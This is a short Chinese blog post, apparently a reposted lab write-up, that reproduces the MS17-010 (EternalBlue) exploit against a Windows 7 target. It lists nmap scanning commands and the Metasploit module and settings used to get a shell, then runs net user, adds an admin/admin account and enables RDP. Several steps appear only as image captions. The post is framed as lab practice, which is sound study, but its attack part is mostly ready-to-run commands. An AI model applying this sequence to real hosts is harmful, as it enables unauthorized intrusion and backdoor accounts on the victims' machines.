• 微信公众号:美女很有趣。 工作之余,放松一下,关注即送10G+美女照片!

MS17010(永恒之蓝)漏洞复现

互联网 diligentman 3小时前 3次浏览

MS17010(永恒之蓝)漏洞利用与复现

首先需要准备win7的环境做为靶机

获取信息

利用nmap扫描得到,靶机IP

nmap -sP 192.168.229.0/24

得到:
IP:192.168.229.169
MS17010(永恒之蓝)漏洞复现

然后利用:

nmap --script=vuln 192.168.229.169

得到靶机信息:

MS17010(永恒之蓝)漏洞复现

发现可能利用的漏洞:
ms17-010

然后启动msf

msfconsole

然后查找漏洞路径:

search ms17-010

MS17010(永恒之蓝)漏洞复现
使用payload进行攻击:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.229.169
run

MS17010(永恒之蓝)漏洞复现
然后输入:shell

MS17010(永恒之蓝)漏洞复现

然后在查看当前用户:

net user

MS17010(永恒之蓝)漏洞复现
发现用乱码可以用这个取消乱码:

chcp 65001

然后添加一个admin用户密码也为admin

MS17010(永恒之蓝)漏洞复现

然后开启3389端口:

MS17010(永恒之蓝)漏洞复现

然后在开启远程控制:

MS17010(永恒之蓝)漏洞复现

得到:

MS17010(永恒之蓝)漏洞复现


程序员灯塔
转载请注明原文链接:MS17010(永恒之蓝)漏洞复现
喜欢 (0)